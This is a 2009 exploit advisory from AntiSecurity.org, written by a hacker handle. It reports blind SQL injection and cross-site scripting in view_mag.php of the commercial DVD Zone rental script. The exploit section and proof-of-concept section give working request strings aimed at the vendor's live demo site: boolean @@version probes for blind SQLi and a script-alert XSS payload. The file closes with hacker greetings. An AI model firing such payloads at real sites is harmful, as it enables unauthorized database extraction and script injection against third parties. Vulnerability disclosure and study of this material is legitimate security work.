DVD Zone suffers from remote blind SQL injection and cross site scripting vulnerabilities in view_mag.php.
0e9c99001e1b92819b3915f76dae3c93a5b8537b8b45263456c1584c048efadb
[x]========================================================================================================================================[x]
| AntiSecurity[dot]org |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Title : DVD Zone view_mag.php?mag_id= (BSQL/XSS) Multiple Remote Vulnerabilities |
| Software : DVD Zone Boast Your DVD Rental Business |
| Vendor : http://www.vastal.com/ |
| Demo : http://dvdzone.vastal.com |
| Price : $399.99 |
| Date : 22 September 2009 ( Indonesia ) |
| Author : OoN_Boy |
| Contact : oon.boy9@gmail.com |
| Web : http://oonboy.info |
| Blog : http://oonboy.blogspot.com |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Description : You can boast the revenue generated by your DVD Rental Business by allowing the users to order online. We have |
| provided many features which can be really useful for the users who may wish to rent a DVD. They can add a DVD in |
| their wish list and can move the DVD's on their wish list up or down depending on the priority on which they want |
| to rent that DVD. They can see the DVD's which have been sent to them and are on their hands by just visiting |
| their account. So there is no delay in returning them. You have full control of the genres you want to use through|
| our extensive admin panel. You can add as many DVD's as you want with just a click. You have full control over the|
| CMS of the website, you can edit it on the fly. We have provided a HTML WYSIWYG Editor so you do not have to do |
| any kind pf programming. Please check out the demo site to see the script in action |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Google Dork : uh ah oh.... |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit : http://localhost/[path]/view_mag.php?mag_id=[sql] |
| : http://localhost/[path]/view_mag.php?mag_id=[xss]
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept : http://dvdzone.vastal.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=5 True |
| http://dvdzone.vastal.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=4 False |
| http://dvdzone.vastal.com/view_mag.php?mag_id=<script>alert(123)</script>
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id |
| Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va |
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Note : Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah all :) |
| kabur.... untuk sementara waktu.... bye bye..... |
[x]========================================================================================================================================[x]